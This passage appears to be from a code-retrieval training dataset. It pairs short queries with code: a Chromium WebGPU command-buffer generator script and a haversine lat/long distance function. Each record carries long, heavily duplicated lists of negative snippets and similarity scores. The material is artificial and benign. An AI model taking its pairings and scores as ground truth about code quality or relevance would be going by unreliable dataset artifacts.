"0.39882106", "0.39878753", "0.39875484", "0.39825442", "0.39814815", "0.39792848", "0.39777932", "0.3971436", "0.3970127", "0.39682966", "0.39659464", "0.39626384", "0.39622143", "0.3956733", "0.39560375", "0.395576", "0.39536393", "0.3949954", "0.39464", "0.3945824", "0.39436236", "0.39411995", "0.39402574" ]
0.83031076
0
This is the main function.
def main(argv):
  parser = OptionParser()
  parser.add_option(
      "--output-dir",
      help="Output directory for generated files. Defaults to chromium root "
      "directory.")
  parser.add_option(
      "-v", "--verbose", action="store_true", help="Verbose logging output.")
  parser.add_option(
      "-c", "--check", action="store_true",
      help="Check if output files match generated files in chromium root "
      "directory. Use this in PRESUBMIT scripts with --output-dir.")
  (options, _) = parser.parse_args(args=argv)

  # This script lives under src/gpu/command_buffer.
  script_dir = os.path.dirname(os.path.abspath(__file__))
  assert script_dir.endswith(os.path.normpath("src/gpu/command_buffer"))
  # os.path.join doesn't do the right thing with relative paths.
  chromium_root_dir = os.path.abspath(script_dir + "/../..")

  # Support generating files under gen/ and for PRESUBMIT.
  if options.output_dir:
    output_dir = options.output_dir
  else:
    output_dir = chromium_root_dir
  os.chdir(output_dir)

  # This script lives under gpu/command_buffer, cd to base directory.
  build_cmd_buffer_lib.InitializePrefix("WebGPU")
  gen = build_cmd_buffer_lib.GLGenerator(
      options.verbose, "2018", _FUNCTION_INFO, _NAMED_TYPE_INFO,
      chromium_root_dir)
  gen.ParseGLH("gpu/command_buffer/webgpu_cmd_buffer_functions.txt")

  gen.WriteCommandIds("gpu/command_buffer/common/webgpu_cmd_ids_autogen.h")
  gen.WriteFormat("gpu/command_buffer/common/webgpu_cmd_format_autogen.h")
  gen.WriteFormatTest(
      "gpu/command_buffer/common/webgpu_cmd_format_test_autogen.h")
  gen.WriteGLES2InterfaceHeader(
      "gpu/command_buffer/client/webgpu_interface_autogen.h")
  gen.WriteGLES2ImplementationHeader(
      "gpu/command_buffer/client/webgpu_implementation_autogen.h")
  gen.WriteGLES2InterfaceStub(
      "gpu/command_buffer/client/webgpu_interface_stub_autogen.h")
  gen.WriteGLES2InterfaceStubImpl(
      "gpu/command_buffer/client/webgpu_interface_stub_impl_autogen.h")
  gen.WriteGLES2Implementation(
      "gpu/command_buffer/client/webgpu_implementation_impl_autogen.h")
  gen.WriteGLES2ImplementationUnitTests(
      "gpu/command_buffer/client/webgpu_implementation_unittest_autogen.h")
  gen.WriteCmdHelperHeader(
      "gpu/command_buffer/client/webgpu_cmd_helper_autogen.h")
  # Note: No gen.WriteServiceImplementation
  # Note: No gen.WriteServiceUnitTests
  gen.WriteServiceUtilsHeader(
      "gpu/command_buffer/service/webgpu_cmd_validation_autogen.h")
  gen.WriteServiceUtilsImplementation(
      "gpu/command_buffer/service/"
      "webgpu_cmd_validation_implementation_autogen.h")

  build_cmd_buffer_lib.Format(gen.generated_cpp_filenames, output_dir,
                              chromium_root_dir)

  if gen.errors > 0:
    print("build_webgpu_cmd_buffer.py: Failed with %d errors" % gen.errors)
    return 1

  check_failed_filenames = []
  if options.check:
    for filename in gen.generated_cpp_filenames:
      if not filecmp.cmp(os.path.join(output_dir, filename),
                         os.path.join(chromium_root_dir, filename)):
        check_failed_filenames.append(filename)

  if len(check_failed_filenames) > 0:
    print('Please run gpu/command_buffer/build_webgpu_cmd_buffer.py')
    print('Failed check on autogenerated command buffer files:')
    for filename in check_failed_filenames:
      print(filename)
    return 1

  return 0
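The snippet above stops at main() and is normally driven by command-line flags (--output-dir, -v/--verbose, -c/--check). As an illustration only, a minimal entry-point wiring might look like the sketch below; the sys.argv[1:] convention is an assumption and is not part of the original entry.

import sys

if __name__ == "__main__":
    # Forward the command-line flags to main(); main() returns 0 on success
    # and 1 on failure, which becomes the process exit code.
    sys.exit(main(sys.argv[1:]))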
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main(self):", "def main():\n return", "def main():\n pass", "def main():\n\tpass", "def main() -> None:", "def main() -> None:", "def main() -> None:", "def main() -> None:", "def main(self):\r\n pass", "def main(self) -> None:\n pass", "def main():\n\n pass", "def main():\n Main()", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n ...", "def main(args):", "def main(args):", "def main() -> None:\n return", "def main(args=None):", "def main(args=None):", "def main():\n pass", "def main():\n return 0", "def main():\n return 0", "def main(self):\n pass", "def main():\n\n pass\n\n return None", "def main():\n\n pass\n\n return None", "def run():\n main()", "def main():\n print(\"It works!!! ;-)\")\n ###TODO### do something with the various methods/functions of this file", "def main(self, params):\n pass", "def main():\n run_program()", "def main(cls):\n raise NotImplementedError", "def main(ctx, verbose):\n return", "def main():\n print(\"is Running!\")", "def main(args=None):\n pass", "def main(self, **kwargs) -> None:\n ...", "def main():\n example()", "def main():\n example()", "def main():\n example()", "def main():\n example()", "def main():\n print(\"Everythin is ok\")", "def main():\r\n print(\"JoJo\")", "def main():\n produce()", "def main():\n print(\"Call your main application code here\")", "def main():\n print(\"Call your main application code here\")", "def main():\n print(\"Call your main application code here\")", "def main():\n\tcli = Cli()\n\tcli.run()", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def main(source):\n pass" ]
[ "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.8863137", "0.8862527", "0.88110864", "0.86527646", "0.8560629", "0.8560629", "0.8560629", "0.8560629", "0.8560105", "0.8322307", "0.8237105", "0.8202578", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.81902087", "0.81512976", "0.81512976", "0.8074574", "0.8064473", "0.8064473", "0.7900137", "0.78820544", "0.78820544", "0.7854387", "0.78442204", "0.78442204", "0.76672214", "0.7635493", "0.7456157", "0.74527043", "0.7435258", "0.7416191", "0.7351965", "0.73471636", "0.7305677", "0.7298485", "0.7298485", "0.7298485", "0.7298485", "0.7218086", "0.72115856", "0.7200565", "0.71952176", "0.71952176", "0.71952176", "0.7163458", "0.7154568", "0.7154568", "0.7154568", "0.7154568", "0.7154568", "0.7154568", "0.7154568", "0.7154568", "0.7154568", "0.7154568", "0.71185845" ]
0.0
-1
Compute Haversine distance between points. LatLongDistance(p1, p2) returns distance in meters between points p1 and p2. A point p is a list/array p=[longitude, latitude]
def latlong_distance(p1, p2):
    radius = 6371  # km

    lat1 = p1[1] * math.pi / 180.0
    lat2 = p2[1] * math.pi / 180.0
    lon1 = p1[0] * math.pi / 180.0
    lon2 = p2[0] * math.pi / 180.0

    deltaLat = lat2 - lat1
    deltaLon = lon2 - lon1

    a = (math.sin(deltaLat / 2)**2 +
         math.cos(lat1) * math.cos(lat2) * math.sin(deltaLon / 2)**2)
    c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
    d = radius * c
    d = d * 1e3  # Return in m
    return d
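For illustration, a quick sanity check of the function above. The city coordinates and the expected ~344 km figure are example values added here, not part of the original entry; math must be imported for latlong_distance to run.

import math

# Points follow the [longitude, latitude] convention described above.
paris = [2.3522, 48.8566]
london = [-0.1278, 51.5074]

d_m = latlong_distance(paris, london)
print(round(d_m / 1e3, 1), "km")  # roughly 344 km great-circle distance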
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def haversine(point_1, \n point_2):\n # Specify the radius of the Earth in kilometers\n earth_radius = 6372.8\n # Extract latitudes and longitudes from the provided points\n latitude_1 = point_1[0]\n latitude_2 = point_2[0]\n longitude_1 = point_1[1]\n longitude_2 = point_2[1]\n # Convert the latitudes and longitudes to radians\n latitude_1, longitude_1 = np.radians((latitude_1, longitude_1))\n latitude_2, longitude_2 = np.radians((latitude_2, longitude_2))\n # Calculate the differences between latitudes in radians\n latitude_difference = latitude_2 - latitude_1\n # Calculate the differences between longitudes in radians\n longitude_difference = longitude_2 - longitude_1\n # Calculate the haversine distance between the coordinates\n step_1 = np.square(np.sin(np.multiply(latitude_difference, 0.5)))\n step_2 = np.square(np.sin(np.multiply(longitude_difference, 0.5)))\n step_3 = np.multiply(np.cos(latitude_1), np.cos(latitude_2))\n step_4 = np.arcsin(np.sqrt(step_1 + np.multiply(step_2, step_3)))\n haversine_distance = np.multiply(np.multiply(2, earth_radius), step_4)\n # Return the computed haversine distance for the coordinates\n return haversine_distance", "def haversine_distance(df, lat1, long1, lat2, long2):\n r = 6371 # average radius of Earth in kilometers\n phi1 = np.radians(df[lat1])\n phi2 = np.radians(df[lat2])\n\n delta_phi = np.radians(df[lat2] - df[lat1])\n delta_lamda = np.radians(df[long2] - df[long1])\n\n a = np.sin(delta_phi/2) ** 2 + np.cos(phi1) * np.cos(phi2) * \\\n np.sin(delta_lamda / 2) * np.sin(delta_lamda / 2)\n c = 2 * np.arctan2(np.sqrt(a), np.sqrt(1 - a))\n d = (r * c) # in kilometers\n\n return d", "def haversine(p1, p2):\n # Convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(np.radians, [p1[0], p1[1], p2[0], p2[1]])\n \n # Haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = np.sin(dlat/2)**2 + np.cos(lat1) * np.cos(lat2) * np.sin(dlon/2)**2\n c = 2 * np.arcsin(np.sqrt(a)) \n r = 6371 \n \n return c * r", "def distance_gps(point1, point2):\n return haversine_distance(point1.get_latitude(), point1.get_longitude(),\n point2.get_latitude(), point2.get_longitude())", "def haversine_dist(lat1, lng1, lat2, lng2):\n R = 6371 # mean radius of earth in kms\n # convert decimal degrees to radians \n lng1, lat1, lng2, lat2 = map(radians, [lng1, lat1, lng2, lat2])\n # haversine formula \n dlon = lng2 - lng1 \n dlat = lat2 - lat1 \n a = (sin(dlat/2))**2 + cos(lat1) * cos(lat2) * (sin(dlon/2))**2\n c = 2 * atan2(sqrt(a), sqrt(1-a))\n km = R * c\n return km", "def haversine_distance(self, end_point):\n \n dlng = math.radians(end_point.lng - self.lng) \n dlat = math.radians(end_point.lat - self.lat)\n # a is the square of half the chord length between the points.'''\n a = math.sin(dlat/2) * math.sin(dlat/2) + math.cos( math.radians(self.lat) ) * math.cos( math.radians(end_point.lat) ) * math.sin(dlng/2) * math.sin(dlng/2)\n # Account for rounding errors. 
If a is very close to 1 set it to one to avoid domain exception.'''\n if math.fabs(1-a) < 1e-10:\n a = 1\n # c is the angular distance in radians between the points.'''\n x = math.sqrt(1-a)\n y = math.sqrt(a)\n c = 2 * math.atan2(y, x)\n return A_WGS84 * c", "def haversine_np(lon1, lat1, lon2, lat2):\n\n lon1, lat1, lon2, lat2 = map(np.radians, [lon1, lat1, lon2, lat2])\n\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n\n a = np.sin(dlat/2.0)**2 + np.cos(lat1) * np.cos(lat2) * np.sin(dlon/2.0)**2\n\n c = 2 * np.arcsin(np.sqrt(a))\n km = 6367 * c\n\n return km", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1 = math.radians(lon1)\n lat1 = math.radians(lat1)\n lon2 = math.radians(lon2)\n lat2 = math.radians(lat2)\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n hav_a = (math.sin(dlat/2)**2\n + math.cos(lat1) * math.cos(lat2) * math.sin(dlon/2)**2)\n hav_c = 2 * math.asin(math.sqrt(hav_a))\n\n # 6367 km is the radius of the Earth\n dist_km = 6371 * hav_c\n return dist_km", "def haversine(lon1, lat1, lon2, lat2):\n lon1, lat1, lon2, lat2 = float(lon1), float(lat1), float(lon2), float(lat2)\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n # Radius of earth in kilometers is 6371\n m = 6371 * c * 1000\n return m", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = \\\n [math.radians(deg) for deg in [lon1, lat1, lon2, lat2]]\n # haversine formula \n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = math.sin(dlat / 2) ** 2 + math.cos(lat1) * \\\n math.cos(lat2) * math.sin(dlon / 2) ** 2\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n meters = 6367 * c * 1000\n return meters", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n # Radius of earth in kilometers is 6371\n m = 6371000* c #meters\n return m", "def haversine(lon1, lat1, lon2, lat2): \r\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2]) \r\n #print 34\r\n dlon = lon2 - lon1 \r\n dlat = lat2 - lat1 \r\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2 \r\n c = 2 * atan(sqrt(a)/sqrt(1-a)) \r\n r = 6371 \r\n d=c * r\r\n #print type(d)\r\n return d", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n # Radius of earth in kilometers is 6371\n m = 6371 * c * 1000\n return m", "def haversine(p1=None, p2=None):\n lat1, lon1 = p1\n lat2, lon2 = p2\n p = pi/180\n a = 0.5 - cos((lat2-lat1)*p)/2 + cos(lat1*p) * cos(lat2*p) * (1-cos((lon2-lon1)*p))/2 \n return 12742 * asin(sqrt(a)) #2*R*asin...", "def haversine(lat1, lng1, lat2, lng2):\n lat1, lng1, lat2, lng2 = map(np.radians, (lat1, lng1, lat2, lng2))\n AVG_EARTH_RADIUS = 6371 # in km\n lat = lat2 - lat1\n lng = lng2 - lng1\n d = np.sin(lat * 0.5) ** 2 + np.cos(lat1) * np.cos(lat2) * np.sin(lng * 0.5) ** 2\n h = 2 * AVG_EARTH_RADIUS * np.arcsin(np.sqrt(d))\n 
return(h)", "def haversine(lat1, lon1, lat2, lon2):\n\t\t # convert decimal degrees to radians \n\t\t lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\t\t # haversine formula \n\t\t dlon = lon2 - lon1 \n\t\t dlat = lat2 - lat1 \n\t\t a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n\t\t c = 2 * asin(sqrt(a)) \n\t\t km = 6367 * c\n\t\t return km", "def distance(gps1, gps2):\n return haversine(gps1.lng, gps1.lat, gps2.lng, gps2.lat)", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = list(map(radians, [lon1, lat1, lon2, lat2]))\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a))\n km = 6367 * c\n m = 1000. * km\n return m", "def haversine(lon1, lat1, lon2, lat2):\r\n # convert decimal degrees to radians\r\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\r\n # haversine formula\r\n dlon = lon2 - lon1\r\n dlat = lat2 - lat1\r\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\r\n c = 2 * asin(sqrt(a))\r\n km = 6367 * c\r\n return km", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = math.sin(dlat/2)**2 + math.cos(lat1) * math.cos(lat2) * math.sin(dlon/2)**2\n c = 2 * math.asin(math.sqrt(a)) \n km = 6367 * c\n return km", "def haversine(lon1, lat1, lon2, lat2):\r\n # convert decimal degrees to radians \r\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\r\n # haversine formula \r\n dlon = lon2 - lon1 \r\n dlat = lat2 - lat1 \r\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\r\n c = 2 * asin(sqrt(a)) \r\n km = 6367 * c\r\n return km", "def haversine(lon1, lat1, lon2, lat2):\n # https://stackoverflow.com/questions/15736995/how-can-i-quickly-estimate-the-distance-between-two-latitude-longitude-points\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n # Radius of earth in kilometers is 6371\n km = 6371 * c\n return km", "def haversine(p,q):\n lng1, lat1 = p\n lng2, lat2 = q\n dlng = abs(lng2-lng1)\n dlat = abs(lat2-lat1)\n\n a = np.sin(0.5*dlng)**2 + np.cos(lng1)*np.cos(lng2)*np.sin(0.5*dlat)**2\n c = 2 * np.arctan2(np.sqrt(a),np.sqrt(1-a))\n return c*6371 # earth radius", "def haversine(gps1, gps2):\n (lon1, lat1) = gps1\n (lon2, lat2) = gps2\n\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a))\n r = 6371 # Radius of earth in kilometers. 
Use 3956 for miles\n return c * r", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = list(map(radians, [lon1, lat1, lon2, lat2]))\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n km = 6367 * c\n return km", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n km = 6367 * c\n return km", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n km = 6367 * c\n return km", "def haversine(lat1, lon1, lat2, lon2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n km = 6367 * c\n return km", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n # Radius of earth in kilometers is 6371\n km = 6371* c\n return km", "def haversine(lon1, lat1, lon2, lat2):\n\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n km = 6367 * c\n return (km * 1000)", "def haversine(lon1, lat1, lon2, lat2):\n\t# convert decimal degrees to radians \n\tlon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\t# haversine formula \n\tdlon = lon2 - lon1 \n\tdlat = lat2 - lat1 \n\ta = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n\tc = 2 * asin(sqrt(a)) \n\tkm = 6367 * c\n\n\n\treturn km", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a))\n # Radius of earth in kilometers is 6371\n km = 6371* c\n return km", "def nphaversine(point1, point2, miles=False):\n\n# print point1\n# print point2 \n \n # unpack latitude/longitude\n if len(point1.shape) == 1:\n point1 = np.array([point1])\n if len(point2.shape) == 1:\n point2 = np.array([point2])\n \n# print point1\n# print point2 \n point1 = np.radians(point1)\n point2 = np.radians(point2)\n \n \n\n # convert all latitudes/longitudes from decimal degrees to radians\n# lat1, lng1, lat2, lng2 = map(np.radians, (lat1, lng1, lat2, lng2))\n\n # calculate haversine\n d = np.power(np.sin((point2[:,0] - point1[:,0]) / 2) , 2) + np.cos(point1[:,0]) * np.cos(point2[:,0]) * np.power(np.sin((point2[:,1] - point1[:,1]) / 2), 2)\n h = 2 * AVG_EARTH_RADIUS * np.arcsin(np.sqrt(d))\n if miles:\n return h * 0.621371 # in miles\n 
else:\n return h # in kilometers", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(math.radians, [lon1, lat1, lon2, lat2])\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = math.sin(dlat/2)**2 + math.cos(lat1) * math.cos(lat2) * math.sin(dlon/2)**2\n c = 2 * math.asin(np.sqrt(a))\n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\n return c * r", "def distance(lat0, lng0, lat1, lng1):\n # convert decimal degrees to radians \n lat0, lng0, lat1, lng1 = map(radians, [lat0, lng0, lat1, lng1])\n # haversine formula \n dlng = lng1 - lng0 \n dlat = lat1 - lat0 \n a = sin(dlat/2)**2 + cos(lat0) * cos(lat1) * sin(dlng/2)**2\n c = 2 * asin(sqrt(a)) \n m = 6367000 * c\n return m", "def calc_distance_two_points(lat_from, long_from, lat_to, long_to):\n distance_in_km = haversine(\n (lat_from, long_from),\n (lat_to, long_to),\n unit='km')\n\n return distance_in_km", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula\n\n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\n return c * r", "def haversine(self,lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n km = 6367 * c\n return km*1000", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n km = 6367 * c\n metres = km * 1000\n return metres", "def calc_distance_haversine(coord1, coord2):\n lat1, lon1 = coord1\n lat2, lon2 = coord2\n # approximate radius of earth in km\n R = 6373.0\n\n lat1 = radians(lat1)\n lon1 = radians(lon1)\n lat2 = radians(lat2)\n lon2 = radians(lon2)\n\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * atan2(sqrt(a), sqrt(1 - a))\n\n distance = R * c\n\n return distance", "def haversine(lon1, lat1, lon2, lat2):\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n r = 6371000 # Radius of earth in kilometers. 
Use 3956 for miles\n return c * r", "def haversine_distance(self, p1, p2):\n r = 6371000\n\n # Setting up haversine terms of distance expansion\n hav_1 = np.power(np.sin((p2[1] - p1[1]) / 2 * np.pi / 180), 2.0)\n hav_2 = np.cos(p2[1] * np.pi / 180) * np.cos(p1[1] * np.pi / 180) * np.power(\n np.sin((p2[0] - p1[0]) / 2 * np.pi / 180), 2.0)\n\n # taking the arcsine of the root of the sum of the haversine terms\n root = np.sqrt(hav_1 + hav_2)\n arc = np.arcsin(root)\n\n # return final distance between the two points\n return 2 * r * arc", "def haversine(test_point, training_locations):\n test_point = test_point.reshape(1, 2)\n difference = (test_point - training_locations) * np.pi / 180\n test_point_lat = test_point[:, 1] * np.pi / 180\n training_locations_lat = training_locations[:, 1] * np.pi / 180\n \n a = np.sin(difference[:, 0] / 2)**2 * np.cos(test_point_lat) * np.cos(training_locations_lat) +\\\n np.sin(difference[:, 1] / 2)**2 \n radius = 6371\n c = 2 * np.arcsin(np.sqrt(a))\n return radius * c", "def haversine_dist(this_lat, this_lon, lat_vec, lon_vec):\n this_lat, this_lon, lat_vec, lon_vec = map(np.radians, (this_lat, this_lon, lat_vec, lon_vec))\n dlat = lat_vec - this_lat\n dlon = lon_vec - this_lon\n a = np.square(np.sin(dlat/2)) + np.cos(this_lat) * np.multiply(np.cos(lat_vec), np.square(np.sin(dlon/2)))\n c = 2 * np.arcsin(np.sqrt(a))\n return c", "def haversine(lat1, lat2, lon1, lon2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [float(lon1), float(lat1), float(lon2), float(lat2)])\n \n\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\n return c * r", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n r = 6371 * 1000 # Radius of earth in kilometers. Use 3956 for miles\n return c * r", "def haversine(lon1, lat1, lon2, lat2):\r\n # convert decimal degrees to radians \r\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\r\n\r\n # haversine formula \r\n dlon = lon2 - lon1 \r\n dlat = lat2 - lat1 \r\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\r\n c = 2 * asin(sqrt(a)) \r\n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\r\n return c * r", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a))\n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\n return c * r", "def haversine(lon1, lat1, lon2, lat2):\n\t# convert decimal degrees to radians \n\tlon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n\t# haversine formula\n\tdlon = lon2 - lon1 \n\tdlat = lat2 - lat1 \n\ta = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n\tc = 2 * asin(sqrt(a)) \n\tr = 6371000 # Radius of earth in meters. 
